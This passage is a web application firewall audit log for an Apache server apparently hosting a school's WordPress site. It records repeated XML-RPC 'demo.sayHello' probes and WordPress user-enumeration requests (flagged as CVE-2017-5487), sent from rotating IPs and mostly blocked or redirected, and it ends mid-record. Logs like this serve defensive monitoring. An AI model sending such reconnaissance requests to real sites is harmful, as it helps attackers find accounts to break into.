Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f07873f-Z-- --3f0e917a-A-- [17/May/2025:09:56:08 +0700] aCf6yOm4kjNN-hEbWjJDBQAAAEs 103.236.140.4 50566 103.236.140.4 8181 --3f0e917a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f0e917a-C-- demo.sayHello --3f0e917a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0e917a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450568736312 4948 (- - -) Stopwatch2: 1747450568736312 4948; combined=3774, p1=454, p2=3114, p3=24, p4=28, p5=90, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0e917a-Z-- --245d8237-A-- [17/May/2025:09:56:10 +0700] aCf6yum4kjNN-hEbWjJDBgAAAEw 103.236.140.4 50568 103.236.140.4 8181 --245d8237-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --245d8237-C-- demo.sayHello --245d8237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --245d8237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450570479234 5807 (- - -) Stopwatch2: 1747450570479234 5807; combined=4264, p1=515, p2=3523, p3=29, p4=32, p5=96, sr=82, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --245d8237-Z-- --64102c00-A-- [17/May/2025:09:57:08 +0700] aCf7BHyxdQCiyU1ENFcreAAAAAo 103.236.140.4 50590 103.236.140.4 8181 --64102c00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --64102c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64102c00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450628869169 2924 (- - -) Stopwatch2: 1747450628869169 2924; combined=1293, p1=434, p2=829, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64102c00-Z-- --3ba2fa0a-A-- [17/May/2025:09:57:15 +0700] aCf7CwTOsBn9MSWb6WJwBQAAAJg 103.236.140.4 50594 103.236.140.4 8181 --3ba2fa0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ba2fa0a-C-- demo.sayHello --3ba2fa0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ba2fa0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450635074167 5326 (- - -) Stopwatch2: 1747450635074167 5326; combined=3949, p1=467, p2=3268, p3=24, p4=28, p5=95, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ba2fa0a-Z-- --9849e12f-A-- [17/May/2025:09:58:10 +0700] aCf7Qum4kjNN-hEbWjJDCwAAAFU 103.236.140.4 50598 103.236.140.4 8181 --9849e12f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9849e12f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9849e12f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450690775211 3299 (- - -) Stopwatch2: 1747450690775211 3299; combined=1422, p1=483, p2=906, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9849e12f-Z-- --4510d02f-A-- [17/May/2025:09:58:17 +0700] aCf7SQTOsBn9MSWb6WJwBgAAAIE 103.236.140.4 50602 103.236.140.4 8181 --4510d02f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4510d02f-C-- demo.sayHello --4510d02f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4510d02f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450697726941 5778 (- - -) Stopwatch2: 1747450697726941 5778; combined=4201, p1=573, p2=3397, p3=32, p4=44, p5=92, sr=99, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4510d02f-Z-- --73f03274-A-- [17/May/2025:09:58:36 +0700] aCf7XOm4kjNN-hEbWjJDDgAAAEI 103.236.140.4 50610 103.236.140.4 8181 --73f03274-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73f03274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f03274-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450716188548 2524 (- - -) Stopwatch2: 1747450716188548 2524; combined=1210, p1=407, p2=773, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f03274-Z-- --30feea04-A-- [17/May/2025:09:58:44 +0700] aCf7ZATOsBn9MSWb6WJwCQAAAIY 103.236.140.4 50614 103.236.140.4 8181 --30feea04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --30feea04-C-- demo.sayHello --30feea04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --30feea04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450724414334 17959 (- - -) Stopwatch2: 1747450724414334 17959; combined=27726, p1=599, p2=3796, p3=63, p4=45, p5=11625, sr=78, sw=68, l=0, gc=11530 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30feea04-Z-- --d8435d79-A-- [17/May/2025:09:59:04 +0700] aCf7eATOsBn9MSWb6WJwCgAAAIU 103.236.140.4 50618 103.236.140.4 8181 --d8435d79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d8435d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8435d79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450744546303 3321 (- - -) Stopwatch2: 1747450744546303 3321; combined=1422, p1=478, p2=911, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8435d79-Z-- --ea629164-A-- [17/May/2025:09:59:09 +0700] aCf7fem4kjNN-hEbWjJDDwAAAEE 103.236.140.4 50622 103.236.140.4 8181 --ea629164-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ea629164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea629164-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450749259281 2868 (- - -) Stopwatch2: 1747450749259281 2868; combined=1296, p1=432, p2=834, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea629164-Z-- --8e52ce16-A-- [17/May/2025:09:59:10 +0700] aCf7fum4kjNN-hEbWjJDEAAAAEA 103.236.140.4 50624 103.236.140.4 8181 --8e52ce16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e52ce16-C-- demo.sayHello --8e52ce16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e52ce16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450750034583 4843 (- - -) Stopwatch2: 1747450750034583 4843; combined=3903, p1=408, p2=3274, p3=33, p4=37, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e52ce16-Z-- --3a6c4700-A-- [17/May/2025:09:59:15 +0700] aCf7g3yxdQCiyU1ENFcrfAAAAA8 103.236.140.4 50630 103.236.140.4 8181 --3a6c4700-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a6c4700-C-- demo.sayHello --3a6c4700-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a6c4700-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450755057523 4669 (- - -) Stopwatch2: 1747450755057523 4669; combined=3628, p1=436, p2=2946, p3=23, p4=25, p5=117, sr=66, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a6c4700-Z-- --7fe23974-A-- [17/May/2025:10:00:25 +0700] aCf7yRKi5m5upc8uMd6jewAAANU 103.236.140.4 50682 103.236.140.4 8181 --7fe23974-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7fe23974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fe23974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450825925627 2465 (- - -) Stopwatch2: 1747450825925627 2465; combined=1261, p1=398, p2=833, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fe23974-Z-- --c6b3f520-A-- [17/May/2025:10:00:33 +0700] aCf70XyxdQCiyU1ENFcrfgAAABQ 103.236.140.4 50688 103.236.140.4 8181 --c6b3f520-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6b3f520-C-- demo.sayHello --c6b3f520-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6b3f520-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450833370587 5758 (- - -) Stopwatch2: 1747450833370587 5758; combined=4177, p1=548, p2=3404, p3=33, p4=36, p5=93, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6b3f520-Z-- --74e7d133-A-- [17/May/2025:10:01:53 +0700] aCf8Iem4kjNN-hEbWjJDFQAAAEw 103.236.140.4 50694 103.236.140.4 8181 --74e7d133-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --74e7d133-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74e7d133-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450913138874 3374 (- - -) Stopwatch2: 1747450913138874 3374; combined=1478, p1=491, p2=949, p3=0, p4=0, p5=37, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74e7d133-Z-- --d7326735-A-- [17/May/2025:10:01:57 +0700] aCf8JRKi5m5upc8uMd6jfQAAANc 103.236.140.4 50702 103.236.140.4 8181 --d7326735-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d7326735-C-- demo.sayHello --d7326735-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7326735-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450917491908 5022 (- - -) Stopwatch2: 1747450917491908 5022; combined=3907, p1=464, p2=3236, p3=27, p4=24, p5=91, sr=67, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7326735-Z-- --7a9ea91e-A-- [17/May/2025:10:06:09 +0700] aCf9Iem4kjNN-hEbWjJDHAAAAEM 103.236.140.4 50728 103.236.140.4 8181 --7a9ea91e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a9ea91e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a9ea91e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag 